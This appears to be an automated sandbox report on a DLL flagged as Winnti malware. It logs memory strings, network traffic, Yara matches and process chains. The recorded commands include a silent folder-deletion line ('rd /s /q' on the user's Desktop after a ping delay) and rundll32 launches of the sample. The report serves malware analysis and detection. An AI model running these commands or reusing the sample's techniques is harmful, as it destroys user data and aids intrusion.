Source: rundll32.exe, 00000004.00000003.2639468391.000000000344B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2658277587.0000000003449000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640231182.000000000344B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2129869017.0000000003454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093F
Source: rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093G
Source: rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093I
Source: rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093M
Source: rundll32.exe, 00000004.00000002.3147049730.0000000006530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093OW64
Source: rundll32.exe, 00000004.00000003.2353062409.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2298221763.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093P
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093R
Source: rundll32.exe, 00000004.00000002.3142349682.0000000003446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093W5
Source: rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093j
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093s
Source: rundll32.exe, 00000004.00000003.1882444552.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000346D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093z
Source: rundll32.exe, 00000004.00000003.2820845242.000000000346A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2821196346.000000000346A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
Source: rundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?523df019e3ad1
Source: rundll32.exe, 00000004.00000002.3144079935.000000000516C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000345D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1882444552.0000000003466000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880827011.0000000005167000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880865322.0000000005165000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://portrait6.sinaimg.cn/5762479093/blog/180
Source: Amcache.hve.14.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2419824510.0000000006569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/
Source: rundll32.exe, 00000004.00000003.2088146203.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/4.
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/S
Source: rundll32.exe, 00000004.00000003.2698318369.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/a
Source: rundll32.exe, 00000004.00000003.2088146203.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/k
Source: rundll32.exe, 00000004.00000003.2698318369.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/s
Source: rundll32.exe, 00000004.00000003.2331159571.000000000346F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/user
Source: rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.000000000346A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2129869017.0000000003454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093
Source: rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093)
Source: rundll32.exe, 00000004.00000003.2250309348.000000000342E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/57624790935b-56076a3fa776.xml1
Source: rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093K
Source: rundll32.exe, 00000004.00000003.2271634293.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2271351006.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093P
Source: rundll32.exe, 00000004.00000003.2419740054.000000000658D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093ion
Source: rundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004186808.0000000003453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093j
Source: rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093ws
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49816 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.11:49824 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 2JSGOlbNym.dll, type: SAMPLEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 19.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 11.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 70B80000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 71B50000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 77050000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 72B20000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73450000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74670000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73B00000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74BF0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75AA0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 762C0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73310000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73850000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73910000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73EC0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75930000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73390000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73AA0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74AF0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74D70000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 759B0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 763C0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74870000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 733E0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73410000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 738D0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74B80000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75A00000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76410000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73430000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73990000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73C00000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73F40000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74620000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74B40000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74CF0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74D50000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74DC0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75BA0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76B60000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10008AD0: DeviceIoControl,4_2_10008AD0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003F63 ExitWindowsEx,4_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10003F63 ExitWindowsEx,11_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_10003F63 ExitWindowsEx,19_2_10003F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000B2474_2_1000B247
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000B7304_2_1000B730
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000AEE34_2_1000AEE3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1000B24711_2_1000B247
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1000B73011_2_1000B730
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1000AEE311_2_1000AEE3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_1000B24719_2_1000B247
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_1000B73019_2_1000B730
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_1000AEE319_2_1000AEE3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10009148 appears 39 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1000CDB0 appears 48 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10001000 appears 912 times
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 672
Source: 2JSGOlbNym.dllBinary or memory string: OriginalFilenameSHLWAPI.DLL~/ vs 2JSGOlbNym.dll
Source: 2JSGOlbNym.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: 2JSGOlbNym.dll, type: SAMPLEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 19.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engineClassification label: mal100.troj.spyw.evad.winDLL@42/12@1/6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000404F AdjustTokenPrivileges,4_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1000404F AdjustTokenPrivileges,11_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_1000404F AdjustTokenPrivileges,19_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10003FB7 CreateToolhelp32Snapshot,4_2_10003FB7
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\Desktop\12091507Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\107.163.56.251:6658
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3656:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2540:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\M107.163.56.251:6658
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4356
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3732
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\39bf17a7-ec06-4943-ba4f-d97b125659e1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,ClassObject
Source: 2JSGOlbNym.dllReversingLabs: Detection: 89%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,ClassObject
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,InputFile
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,PrintFile
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 672
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",InputFile
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",PrintFile
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 672
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObject
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,ClassObjectJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,InputFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2JSGOlbNym.dll,PrintFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",ClassObjectJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",InputFileJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",PrintFileJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: mfc42.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msvcp60.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
